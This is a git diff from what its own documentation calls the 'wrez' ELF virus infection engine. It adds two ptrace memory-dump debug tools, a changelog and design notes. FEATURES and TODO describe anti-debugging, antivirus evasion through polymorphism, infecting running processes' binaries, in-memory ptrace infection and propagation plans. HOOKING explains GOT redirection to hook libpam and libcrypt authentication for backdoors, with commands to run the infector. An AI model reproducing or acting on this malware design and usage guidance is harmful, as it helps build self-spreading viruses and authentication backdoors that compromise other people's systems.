+        FILE *                  map_f;          /* /proc/<pid>/maps stream */
+        unsigned char           map_line[256];  /* one line each from map */
+
+        /* data for the dump files */
+        FILE *                  dump_f;         /* stream */
+        char                    dump_name[64];  /* filename buffer */
+
+
+        if (argc < 3 || sscanf (argv[1], "0x%lx", &eip) != 1) {
+                printf ("usage: %s <eip> <argv0 [argv1 [...]]>\n\n", argv[0]);
+                printf ("will run 'argv0' as program with given arguments, "
+                                "until 'eip' is reached, then\n"
+                        "dumping 'len' bytes from 'addr'.\n\n"
+                        "example: %s 0x08049014 0x08048000 0x100 /bin/ls "
+                                "-l\n\n", argv[0]);
+
+                exit (EXIT_FAILURE);
+        }
+
+        argv0 = argv[2];
+
+        fpid = fork ();
+        if (fpid < 0) {
+                perror ("fork");
+                exit (EXIT_FAILURE);
+        }
+        if (fpid == 0) {        /* child */
+                if (ptrace (PTRACE_TRACEME, 0, NULL, NULL) != 0) {
+                        perror ("ptrace PTRACE_TRACEME");
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "  child: TRACEME set\n");
+
+                fprintf (stderr, "  child: executing: %s\n", argv[2]);
+                close (1);
+                dup2 (2, 1);
+                execve (argv[2], &argv[2], NULL);
+
+                /* failed ? */
+                perror ("execve");
+                exit (EXIT_FAILURE);
+        }
+
+        wait (NULL);
+
+        memset (&regs, 0, sizeof (regs));
+
+        if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (stderr, "[0x%08lx] first stop\n", regs.regs.eip);
+
+        /* now single step until given eip is reached */
+        do {
+                if (ptrace (PTRACE_SINGLESTEP, fpid, NULL, NULL) < 0) {
+                        perror ("ptrace PTRACE_SINGLESTEP");
+                        exit (EXIT_FAILURE);
+                }
+                wait (NULL);
+
+                memset (&regs, 0, sizeof (regs));
+                if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                        perror ("ptrace PTRACE_GETREGS");
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "0x%08lx\n", regs.regs.eip);
+        } while (regs.regs.eip != eip);
+
+        fprintf (stderr, "MEMDUMP: eip @ 0x%08lx, dumping...\n", eip);
+
+        snprintf (dump_name, sizeof (dump_name), "%s.regs",
+                basename (argv0));
+        dump_name[sizeof (dump_name) - 1] = '\0';
+        dump_f = fopen (dump_name, "w");
+        if (dump_f == NULL) {
+                perror ("fopen dumpfile regs");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (dump_f, "eax = 0x%08lx\n", regs.regs.eax);
+        fprintf (dump_f, "ebx = 0x%08lx\n", regs.regs.ebx);
+        fprintf (dump_f, "ecx = 0x%08lx\n", regs.regs.ecx);
+        fprintf (dump_f, "edx = 0x%08lx\n", regs.regs.edx);
+        fprintf (dump_f, "esi = 0x%08lx\n", regs.regs.esi);
+        fprintf (dump_f, "edi = 0x%08lx\n", regs.regs.edi);
+        fprintf (dump_f, "ebp = 0x%08lx\n", regs.regs.ebp);
+        fprintf (dump_f, "esp = 0x%08lx\n", regs.regs.esp);
+        fprintf (dump_f, "eflags = 0x%08lx\n", regs.regs.eflags);
+        fprintf (dump_f, "xcs = 0x%08lx\n", regs.regs.xcs);
+        fprintf (dump_f, "xds = 0x%08lx\n", regs.regs.xds);
+        fprintf (dump_f, "xes = 0x%08lx\n", regs.regs.xes);
+        fprintf (dump_f, "xss = 0x%08lx\n", regs.regs.xss);
+        fclose (dump_f);
+
+        snprintf (map_line, sizeof (map_line), "/proc/%d/maps", fpid);
+        map_line[sizeof (map_line) -  1] = '\0';
+        map_f = fopen (map_line, "r");
+        if (map_f == NULL) {
+                perror ("fopen map-file");
+
+                exit (EXIT_FAILURE);
+        }
+
+        while (fgets (map_line, sizeof (map_line), map_f) != NULL) {
+                char            map_perm[8];
+
+                if (sscanf (map_line, "%08lx-%08lx %7[rwxp-] ",
+                        &addr, &addr_end, map_perm) != 3)
+                {
+                        perror ("invalid map-line");
+
+                        exit (EXIT_FAILURE);
+                }
+                if (addr_end < addr) {
+                        fprintf (stderr, "sanity required, not so: "
+                                "addr = 0x%08lx, addr_end = 0x%08lx",
+                                addr, addr_end);
+
+                        exit (EXIT_FAILURE);
+                }
+                len = addr_end - addr;
+                map_perm[sizeof (map_perm) - 1] = '\0'; /* ;-) */
+
+                fprintf (stderr, "MEMDUMP: -> 0x%08lx (0x%08lx bytes, "
+                        "perm %s)\n", addr, len, map_perm);
+
+                snprintf (dump_name, sizeof (dump_name),
+                        "%s.0x%08lx.0x%08lx.%s",
+                        basename (argv0), addr, len, map_perm);
+                dump_name[sizeof (dump_name) - 1] = '\0';
+                dump_f = fopen (dump_name, "wb");
+                if (dump_f == NULL) {
+                        perror ("fopen dumpfile");
+
+                        exit (EXIT_FAILURE);
+                }
+
+                /* save data, assuming addr is page aligned */
+                for (addr_walker = 0 ; addr_walker < len ;
+                        addr_walker += sizeof (data_saved))
+                {
+                        errno = 0;
+
+                        *((unsigned long int *) &data_saved[0]) =
+                                ptrace (PTRACE_PEEKDATA, fpid,
+                                        addr + addr_walker, NULL);
+
+                        if (errno == 0 && fwrite (&data_saved[0], 1, 4,
+                                dump_f) != 4)
+                        {
+                                perror ("fwrite dumpfile");
+
+                                exit (EXIT_FAILURE);
+                        } else if (errno != 0) {
+                                fprintf (stderr,
+                                        "[0x%08lx] invalid PTRACE_PEEKDATA\n",
+                                        addr + addr_walker);
+
+                                exit (EXIT_FAILURE);
+                        }
+                }
+
+                fclose (dump_f);
+        }
+        fclose (map_f);
+
+        if (ptrace (PTRACE_DETACH, fpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+
+        fprintf (stderr, "MEMDUMP: success. terminating.\n");
+        exit (EXIT_SUCCESS);
+}
+
+
+
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+
+        return;
+}
diff --git a/other/wrez/debug/pcdump b/other/wrez/debug/pcdump
new file mode 100755
index 0000000..3c77057
--- /dev/null
+++ b/other/wrez/debug/pcdump
diff --git a/other/wrez/debug/pcdump.c b/other/wrez/debug/pcdump.c
new file mode 100644
index 0000000..95b96b7
--- /dev/null
+++ b/other/wrez/debug/pcdump.c
@@ -0,0 +1,148 @@
+/* memory dump utility
+ * -scut
+ */
+
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <libgen.h>     /* basename */
+
+
+void
+hexdump (unsigned char *data, unsigned int amount);
+
+
+int
+main (int argc, char *argv[], char *envp[])
+{
+        pid_t                   fpid;           /* child pid, gets ptraced */
+        char *                  argv0;
+        struct user             regs;           /* PTRACE pulled registers */
+        unsigned long int       addr,           /* segment start address */
+                                addr_end,       /* segment end address */
+                                len;            /* length of segment */
+        unsigned long int       addr_walker,    /* walker to dump memory */
+                                eip;            /* current childs eip */
+
+        /* array to temporarily store data into */
+        unsigned char           data_saved[sizeof (unsigned long int)];
+
+        /* file to read mapping information */
+        FILE *                  map_f;          /* /proc/<pid>/maps stream */
+        unsigned char           map_line[256];  /* one line each from map */
+
+        /* data for the dump files */
+        FILE *                  dump_f;         /* stream */
+        char                    dump_name[64];  /* filename buffer */
+
+
+        if (argc < 2) {
+                printf ("usage: %s <argv0 [argv1 [...]]>\n\n", argv[0]);
+                printf ("will run 'argv0' as program with given arguments, "
+                                "dumping 'eip'\n\n", argv[0]);
+
+                exit (EXIT_FAILURE);
+        }
+
+        fpid = fork ();
+        if (fpid < 0) {
+                perror ("fork");
+                exit (EXIT_FAILURE);
+        }
+        if (fpid == 0) {        /* child */
+                if (ptrace (PTRACE_TRACEME, 0, NULL, NULL) != 0) {
+                        perror ("ptrace PTRACE_TRACEME");
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "  child: TRACEME set\n");
+
+                fprintf (stderr, "  child: executing: %s\n", argv[2]);
+                close (1);
+                dup2 (2, 1);
+                execve (argv[1], &argv[1], envp);
+
+                /* failed ? */
+                perror ("execve");
+                exit (EXIT_FAILURE);
+        }
+
+        wait (NULL);
+
+        memset (&regs, 0, sizeof (regs));
+
+        if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (stderr, "[0x%08lx] first stop\n", regs.regs.eip);
+
+        /* now single step until given eip is reached */
+        do {
+                if (ptrace (PTRACE_SINGLESTEP, fpid, NULL, NULL) < 0) {
+                        perror ("ptrace PTRACE_SINGLESTEP");
+                        exit (EXIT_FAILURE);
+                }
+                wait (NULL);
+
+                memset (&regs, 0, sizeof (regs));
+                if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                        perror ("ptrace PTRACE_GETREGS");
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "0x%08lx\n", regs.regs.eip);
+        } while (1);
+
+        if (ptrace (PTRACE_DETACH, fpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+
+        fprintf (stderr, "MEMDUMP: success. terminating.\n");
+        exit (EXIT_SUCCESS);
+}
+
+
+
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+
+        return;
+}
diff --git a/other/wrez/doc/BUGS_FIXME_FIXME_FIXME b/other/wrez/doc/BUGS_FIXME_FIXME_FIXME
new file mode 100644
index 0000000..515d9cd
--- /dev/null
+++ b/other/wrez/doc/BUGS_FIXME_FIXME_FIXME
@@ -0,0 +1,5 @@
+
+
+poly engine is not PIC and buggy
+
+
diff --git a/other/wrez/doc/CHANGELOG b/other/wrez/doc/CHANGELOG
new file mode 100644
index 0000000..623599d
--- /dev/null
+++ b/other/wrez/doc/CHANGELOG
@@ -0,0 +1,17 @@
+
+0.7.6   add lookup-pm.[ch] generic lookup interface
+        add preliminary inmem.[ch] in-memory infection module
+        fix tons of bugs in the lookup module
+        incorporate inmem module into build process
+        add test targets to makefile
+
+0.7.4   fix bugs in GOT chaining
+        write doc
+        add wrezsweep program
+
+0.7.0   bugfixes, bugfixes, bugfixes
+
+0.6.14  ah, there is a changelog, nice i forgot about it ;)
+
+0.6.8   changelog generated
+
diff --git a/other/wrez/doc/CTORS-CALLING-CODE b/other/wrez/doc/CTORS-CALLING-CODE
new file mode 100644
index 0000000..36c75ec
--- /dev/null
+++ b/other/wrez/doc/CTORS-CALLING-CODE
@@ -0,0 +1,15 @@
+
+0x804bc29 <error+11849>:        add    $0xfffffffc,%ebx
+0x804bc2c <error+11852>:        cmpl   $0xffffffff,(%ebx)
+0x804bc2f <error+11855>:        jne    0x804bc25 <error+11845>
+0x804bc31 <error+11857>:        pop    %ebx
+0x804bc32 <error+11858>:        leave  
+0x804bc33 <error+11859>:        ret    
+0x804bc34 <error+11860>:        push   %ebp
+0x804bc35 <error+11861>:        mov    %esp,%ebp
+0x804bc37 <error+11863>:        sub    $0x8,%esp
+0x804bc3a <error+11866>:        leave  
+(gdb) x/10b $pc
+0x804bc29 <error+11849>:        0x83    0xc3    0xfc
+
+
diff --git a/other/wrez/doc/DEBUGGING b/other/wrez/doc/DEBUGGING
new file mode 100644
index 0000000..d56360d
--- /dev/null
+++ b/other/wrez/doc/DEBUGGING
@@ -0,0 +1,2 @@
+objcopy -j .text -O binary wrez
+objdump --target=binary --architecture=i386 -D wrez
diff --git a/other/wrez/doc/FEATURES b/other/wrez/doc/FEATURES
new file mode 100644
index 0000000..b02c808
--- /dev/null
+++ b/other/wrez/doc/FEATURES
@@ -0,0 +1,65 @@
+
+
+wrez infection engine
+
+
+features
+========
+
+basic features
+--------------
+
+        - fully pic code, useable as shellcode, too
+        - no size restriction on virus code (though < ~20kb is good, see
+          below)
+        - completely modular featureset, most of the code is optional and
+          can be turned on/off through a simple comment in the Makefile
+        - small size: compressed between 2000 and 6000 bytes
+        - fast infection (~30 binaries per second)
+
+
+advanced features
+-----------------
+
+  anti-debugging
+        - strace and ltrace in-memory detection
+        - gdb stealthing, displaying its own memory as "not mapped"
+        - (disabled by default) ptrace-detection
+
+  anti-virus-detection
+        - polymorph decryptor engine (LiME by zhugejin)
+
+  runtime-related
+        - cleanup code, leaving only very small memory footprint
+        - compression engine, crunching the virus down to roughly %60 of the
+          original size. the original virus should be smaller than 20kb, for
+          the decompressor to work properly.
+        - SIGSEGV/SIGILL catching protection around 90% of the virus code.
+          even in case the virus segfaults, its possible to recover to a sane
+          state in 99% of the cases.
+
+  infection-related
+        - activation through .ctors redirection at machine-code level, still
+          leaving the original .ctors section untouched and chaining it
+        - sections/section header table relocation on infection
+        - advanced user-uid infection, locating running processes and their
+          binaries
+        - ability to infect binaries of running processes (avoiding ETXTBUSY)
+        - as best as possible stat preservement when infecting ([cma]time,
+          mode, owner). access time (atime) is only preserved when running
+          as root
+
+  api functionality
+        - call api to any mapped library function (libc and others)
+        - call, hook, chain, modify GOT entries of your host executeable or
+          any mapped library, (i.e. any GOT table). ability to watch and
+          redirect multiple GOT entries across multiple shared libraries
+          at once, watching and re-redirecting them when lazy binding is used.
+        - host fingerprint functionality, change-detection
+
+
+known weaknesses
+================
+
+        - not strip save
+
diff --git a/other/wrez/doc/GOOGLE-PROPAGATION b/other/wrez/doc/GOOGLE-PROPAGATION
new file mode 100644
index 0000000..05fc9e4
--- /dev/null
+++ b/other/wrez/doc/GOOGLE-PROPAGATION
@@ -0,0 +1,12 @@
+
+http://groups.google.com/groups?as_q=warcraft&as_ugroup=rec.games.misc&num=100&as_scoring=d&hl=en
+
+
+so:
+<keyword>       some unique string the virus identifies messages with
+<dgroup>        newsgroup to drop the messages to
+
+
+http://groups.google.com/groups?as_q=keyword&as_ugroup=dgroup&num=100&as_scoring=d&hl=en
+
+
diff --git a/other/wrez/doc/HOOKING b/other/wrez/doc/HOOKING
new file mode 100644
index 0000000..6933506
--- /dev/null
+++ b/other/wrez/doc/HOOKING
@@ -0,0 +1,82 @@
+
+
+wrez - GOT hooking
+short readme file
+
+
+The wrez API provides some functionality to hook functions called from the
+host binary. This functions are:
+
+
+Elf32_Word *
+got_funcloc (void *mybase, char *name);
+
+Elf32_Word *
+got_funcloc_dyn (Elf32_Dyn *dyno, Elf32_Addr loadbase, char *name);
+
+
+The first function is a simple wrapper to the second, which provides more
+precise control what functions you want to hook. Every executeable and every
+shared library within the process space has a global offset table associated
+with it (GOT). The 'got_funcloc' function only affects the GOT of the host
+executeable. With it, you can redirect any library function called from the
+host code. So, if the infected file runs system() or some other library call,
+you can hook it by changing its GOT table entry. The use of the 'got_funcloc'
+function is pretty straightforward, you only have to know the name of the
+function you want to hook and the base address of the executeable. The base
+address is the address of first byte of the ELF header, and usually provided
+through the wrconfig structure after a successful infection.
+
+  You can also hook functions called from shared libraries. But this is only
+true for library functions, but then its even possible to hook intra-library
+function calls, for example if libpam calls one of its internal functions, its
+possible to hook this. It is not possible to hook syscalls within libc, for
+example you cannot hook execve calls within libc. You can, however, hook
+inter-library calls of execve, such as if an external library calls execve.
+
+To sum it up:
+
+    Type of call                | Library relation | Hookable
+    ----------------------------+------------------+-------------------------
+    System call                 | none             | no
+    Library system call         | none             | no
+    Executeable to library      | inter            | yes, GOT of executeable
+    Library to another library  | inter            | yes, GOT of calling lib
+    Library to itself           | intra            | yes, GOT of library
+    ----------------------------+------------------+-------------------------
+
+The most common thing to do is to hook calls the executeable makes, for
+example calls to select, execve and other obvious virus targets.
+
+However, you can also hook some internal calls within the libraries, such as
+authentification functions (libpam, libcrypt, ..) to provide backdoor
+functionality.
+
+
+To hook arbitrary GOT entries, you can use this API function:
+
+int
+got_funcloc_array (void *mybase, char *name, Elf32_Word *darr[], int darr_len);
+
+It fills all GOT locations it can obtain for a function symbol into the darr[]
+array, which can keep darr_len bytes. The function returns the number of
+entries filled.
+
+
+For further information look into lookup.h, lookup.c and wrcore.c
+(LIBC_CALLING_EXAMPLE, GOT_REDIRECTION_EXAMPLE, GOT_DEEP_REDIRECTION_EXAMPLE).
+
+
+To see the redirection code in action, uncomment the two DFLAGS lines in the
+Makefile (GOT_*_EXAMPLE), and execute:
+
+$ make release lookuptest
+$ cp lookup-test/* release-*/
+$ cd release-*
+$ source ldpath.sh
+$ ./infect shared-library-use
+$ ./shared-library-use.infected
+
+See wrcore.c how this is accomplished.
+
+
diff --git a/other/wrez/doc/TODO b/other/wrez/doc/TODO
new file mode 100644
index 0000000..fa7e3de
--- /dev/null
+++ b/other/wrez/doc/TODO
@@ -0,0 +1,40 @@
+
+TODO
+====
+
+short term
+        - record-route option, include timestamp,ip,cwd,uid,uname in the virus
+          on a change on either of those. make the fingerprinting module more
+          flexible to include multiple (arbitrary number) of sources for
+          the fingerprint. make an accumulative api, sort of hashpool
+
+        - ANTI-DEBUG: modify [sl]trace protection to scan for "race" instead
+          of "trac", to defy subterfugue, too (http://subterfugue.org/)
+
+        - replace/provide small inlined assembly versions of:
+          memmove, strstr
+
+        - make more use of the per-host fingerprinting functionality (like:
+          propagation-limitations, mode-change-after-certain-hopcount-reached,
+          ...)
+
+
+mid term
+        - think of a way to make it strip-save
+
+        - add in-memory infection code. try to infect every running process
+          through ptrace, by attaching to it, finding malloc(), and copying
+          itself into the created space. add a special flag into the runtime
+          infected copy, so that its recognized as a) already infected and
+          b) runnign only within-memory. try to make the virus as lasting
+          as possible, even in uid=user environments, where no binary can be
+          infected. make it resident in victim process by hooking some common
+          .plt entry, such as read()/write()/select()
+
+
+long term
+        - discuss ssh and generic pty ideas, maybe do evil things through .plt
+
+        - evaluate further propagation methods (active ones)
+
+
diff --git a/other/wrez/doc/wrez-manual/wrez.aux b/other/wrez/doc/wrez-manual/wrez.aux
new file mode 100644
index 0000000..18ab83a
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.aux
@@ -0,0 +1,15 @@
+'xrdef {Top-title}{WREZ Introduction}
+'xrdef {Top-pg}{1}
+'xrdef {Top-snt}{}
+'xrdef {Building WREZ-title}{Building WREZ}
+'xrdef {Building WREZ-pg}{2}
+'xrdef {Building WREZ-snt}{Section'tie1.1}
+'xrdef {WREZ API-title}{WREZ API}
+'xrdef {WREZ API-pg}{7}
+'xrdef {WREZ API-snt}{Chapter'tie4}
+'xrdef {wrezsweep utility-title}{\command {wrezsweep} utility}
+'xrdef {wrezsweep utility-pg}{11}
+'xrdef {wrezsweep utility-snt}{Section'tie5.2}
+'xrdef {Index-title}{Index}
+'xrdef {Index-pg}{13}
+'xrdef {Index-snt}{}
diff --git a/other/wrez/doc/wrez-manual/wrez.cp b/other/wrez/doc/wrez-manual/wrez.cp
new file mode 100644
index 0000000..b486cec
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.cp
@@ -0,0 +1,31 @@
+\entry{about WREZ}{1}{about WREZ}
+\entry{engine code}{1}{engine code}
+\entry{WREZ toolchain}{1}{WREZ toolchain}
+\entry{building WREZ}{2}{building WREZ}
+\entry{engine features, configuration}{2}{engine features, configuration}
+\entry{release target, files created}{2}{release target, files created}
+\entry{infect wrapper}{2}{infect wrapper}
+\entry{initial infector}{3}{initial infector}
+\entry{initial, command line options}{3}{initial, command line options}
+\entry{wrez.bin.out, configuration}{3}{wrez.bin.out, configuration}
+\entry{source, files}{4}{source, files}
+\entry{helper macros}{7}{helper macros}
+\entry{STRINGPTR macro}{7}{STRINGPTR macro}
+\entry{FUNCPTR macro}{7}{FUNCPTR macro}
+\entry{system calls}{7}{system calls}
+\entry{library calls}{8}{library calls}
+\entry{disinfection}{8}{disinfection}
+\entry{disinfection, manual}{9}{disinfection, manual}
+\entry{removing the virus}{9}{removing the virus}
+\entry{.ctors address, restoring the}{10}{.ctors address, restoring the}
+\entry{PT_LOAD segment header, fixing the}{10}{PT_LOAD segment header, fixing the}
+\entry{section header table offset, fixing the}{10}{section header table offset, fixing the}
+\entry{section header table, fixing the}{10}{section header table, fixing the}
+\entry{wrezsweep utility}{11}{wrezsweep utility}
+\entry{VIT virus}{11}{VIT virus}
+\entry{wrezsweep help}{11}{wrezsweep help}
+\entry{disinfection, automatic}{11}{disinfection, automatic}
+\entry{polymorph disinfection}{11}{polymorph disinfection}
+\entry{wrezsweep verbose mode}{11}{wrezsweep verbose mode}
+\entry{virus extraction, automatic}{11}{virus extraction, automatic}
+\entry{wrezsweep example}{11}{wrezsweep example}
diff --git a/other/wrez/doc/wrez-manual/wrez.cps b/other/wrez/doc/wrez-manual/wrez.cps
new file mode 100644
index 0000000..e74461c
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.cps
@@ -0,0 +1,45 @@
+\initial {.}
+\entry {.ctors address, restoring the}{10}
+\initial {A}
+\entry {about WREZ}{1}
+\initial {B}
+\entry {building WREZ}{2}
+\initial {D}
+\entry {disinfection}{8}
+\entry {disinfection, automatic}{11}
+\entry {disinfection, manual}{9}
+\initial {E}
+\entry {engine code}{1}
+\entry {engine features, configuration}{2}
+\initial {F}
+\entry {FUNCPTR macro}{7}
+\initial {H}
+\entry {helper macros}{7}
+\initial {I}
+\entry {infect wrapper}{2}
+\entry {initial infector}{3}
+\entry {initial, command line options}{3}
+\initial {L}
+\entry {library calls}{8}
+\initial {P}
+\entry {polymorph disinfection}{11}
+\entry {PT_LOAD segment header, fixing the}{10}
+\initial {R}
+\entry {release target, files created}{2}
+\entry {removing the virus}{9}
+\initial {S}
+\entry {section header table offset, fixing the}{10}
+\entry {section header table, fixing the}{10}
+\entry {source, files}{4}
+\entry {STRINGPTR macro}{7}
+\entry {system calls}{7}
+\initial {V}
+\entry {virus extraction, automatic}{11}
+\entry {VIT virus}{11}
+\initial {W}
+\entry {WREZ toolchain}{1}
+\entry {wrez.bin.out, configuration}{3}
+\entry {wrezsweep example}{11}
+\entry {wrezsweep help}{11}
+\entry {wrezsweep utility}{11}
+\entry {wrezsweep verbose mode}{11}
diff --git a/other/wrez/doc/wrez-manual/wrez.fn b/other/wrez/doc/wrez-manual/wrez.fn
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.fn
diff --git a/other/wrez/doc/wrez-manual/wrez.ky b/other/wrez/doc/wrez-manual/wrez.ky
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.ky
diff --git a/other/wrez/doc/wrez-manual/wrez.log b/other/wrez/doc/wrez-manual/wrez.log
new file mode 100644
index 0000000..528afa4
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.log
@@ -0,0 +1,180 @@
+This is pdfTeX, Version 3.14159-1.00a-pretest-20011114-ojmw (Web2C 7.3.7) (format=pdftex 2002.3.30)  14 APR 2002 11:21
+**/secure/cvs-impact/wrez/wrez/doc/wrez-manual/wrez.texinfo
+(/secure/cvs-impact/wrez/wrez/doc/wrez-manual/wrez.texinfo{/usr/share/texmf/pdf
+tex/config/pdftex.cfg}
+Babel <v3.7h> and hyphenation patterns for american, french, german, ngerman, n
+ohyphenation, loaded.
+(/usr/share/texmf/tex/texinfo/texinfo.tex
+Loading texinfo [version 2002-03-01.06]: Basics,
+\bindingoffset=\dimen16
+\normaloffset=\dimen17
+\pagewidth=\dimen18
+\pageheight=\dimen19
+\outerhsize=\dimen20
+\outervsize=\dimen21
+\cornerlong=\dimen22
+\cornerthick=\dimen23
+\topandbottommargin=\dimen24
+\headlinebox=\box16
+\footlinebox=\box17
+\margin=\insert252
+\EMsimple=\toks12
+\singlespaceskip=\skip18
+\groupinvalidhelp=\toks13
+\mil=\dimen25
+\exdentamount=\skip19
+\inmarginspacing=\skip20
+ pdf,
+\tempnum=\count26
+\lnkcount=\count27
+\filename=\toks14
+\filenamelength=\count28
+\pgn=\count29
+\toksA=\toks15
+\toksB=\toks16
+\toksC=\toks17
+\toksD=\toks18
+\boxA=\box18
+\countA=\count30
+
+(/usr/share/texmf/pdftex/plain/misc/pdfcolor.tex) fonts,
+\sffam=\fam8
+\textleading=\dimen26
+\mainmagstep=\count31
+\fontdepth=\count32
+ page headings,
+\titlepagetopglue=\skip21
+\titlepagebottomglue=\skip22
+\evenheadline=\toks19
+\oddheadline=\toks20
+\evenfootline=\toks21
+\oddfootline=\toks22
+
+tables,
+\tableindent=\dimen27
+\itemindent=\dimen28
+\itemmargin=\dimen29
+\itemmax=\dimen30
+\itemno=\count33
+\multitableparskip=\skip23
+\multitableparindent=\skip24
+\multitablecolspace=\dimen31
+\multitablelinespace=\skip25
+\colcount=\count34
+ conditionals, indexing,
+\secondaryindent=\skip26
+\partialpage=\box19
+\doublecolumnhsize=\dimen32
+ sectioning,
+\chapno=\count35
+\secno=\count36
+\subsecno=\count37
+\subsubsecno=\count38
+\appendixno=\count39
+\absseclevel=\count40
+\secbase=\count41
+\chapheadingskip=\skip27
+\secheadingskip=\skip28
+\subsecheadingskip=\skip29
+ toc,
+\tocfile=\write0
+\contentsrightmargin=\skip30
+\savepageno=\count42
+\lastnegativepageno=\count43
+\shortappendixwidth=\dimen33
+\tocindent=\dimen34
+ environments,
+\dblarrowbox=\box20
+\longdblarrowbox=\box21
+\pushcharbox=\box22
+\bullbox=\box23
+\equivbox=\box24
+\errorbox=\box25
+\lispnarrowing=\skip31
+\envskipamount=\skip32
+\circthick=\dimen35
+\cartouter=\dimen36
+\cartinner=\dimen37
+\normbskip=\skip33
+\normpskip=\skip34
+\normlskip=\skip35
+\lskip=\skip36
+\rskip=\skip37
+\tabw=\dimen38
+ defuns,
+\defbodyindent=\skip38
+\defargsindent=\skip39
+\deftypemargin=\skip40
+\deflastargmargin=\skip41
+\parencount=\count44
+ macros,
+\macscribble=\write1
+\paramno=\count45
+\macname=\toks23
+
+cross references,
+\auxfile=\write2
+\savesfregister=\count46
+\footnoteno=\count47
+ (/usr/share/texmf/tex/plain/dvips/epsf.tex
+\epsffilein=\read0
+\epsfframemargin=\dimen39
+\epsfframethickness=\dimen40
+\epsfrsize=\dimen41
+\epsftmp=\dimen42
+\epsftsize=\dimen43
+\epsfxsize=\dimen44
+\epsfysize=\dimen45
+\pspoints=\dimen46
+\epsfnoopenhelp=\toks24
+)
+\noepsfhelp=\toks25
+ localization,
+\nolanghelp=\toks26
+\defaultparindent=\dimen47
+
+and turning on texinfo input format.) (./wrez.aux)
+@cpindfile=@write3
+@fnindfile=@write4
+@vrindfile=@write5
+@tpindfile=@write6
+@kyindfile=@write7
+@pgindfile=@write8
+ [1
+\openout2 = `wrez.aux'.
+
+\openout3 = `wrez.cp'.
+
+\openout4 = `wrez.fn'.
+
+\openout5 = `wrez.vr'.
+
+\openout6 = `wrez.tp'.
+
+\openout7 = `wrez.ky'.
+
+\openout8 = `wrez.pg'.
+
+{/usr/share/texmf/dvips/config/pdftex.map}] [2] (./wrez.toc) [-1] (./wrez.toc) 
+(./wrez.toc)
+(WREZ Introduction)
+\openout0 = `wrez.toc'.
+
+ Chapter 1 [1] [2] Chapter 2 [3] [4] Chapter 3 [5]
+Chapter 4 [6] [7] Chapter 5 [8] [9] [10] [11] (Index) [12] (./wrez.cps)
+[13] ) 
+Here is how much of TeX's memory you used:
+ 1516 strings out of 12477
+ 16330 string characters out of 89681
+ 42065 words of memory out of 263001
+ 2512 multiletter control sequences out of 10000+0
+ 31784 words of font info for 110 fonts, out of 400000 for 1000
+ 19 hyphenation exceptions out of 1000
+ 12i,6n,10p,262b,319s stack positions out of 300i,100n,500p,50000b,4000s
+</usr/share/texmf/fonts/type1/bluesky/cm/cmti9.pfb></usr/share/texmf/font
+s/type1/bluesky/cm/cmr9.pfb></usr/share/texmf/fonts/type1/bluesky/cm/cmtt12.pfb
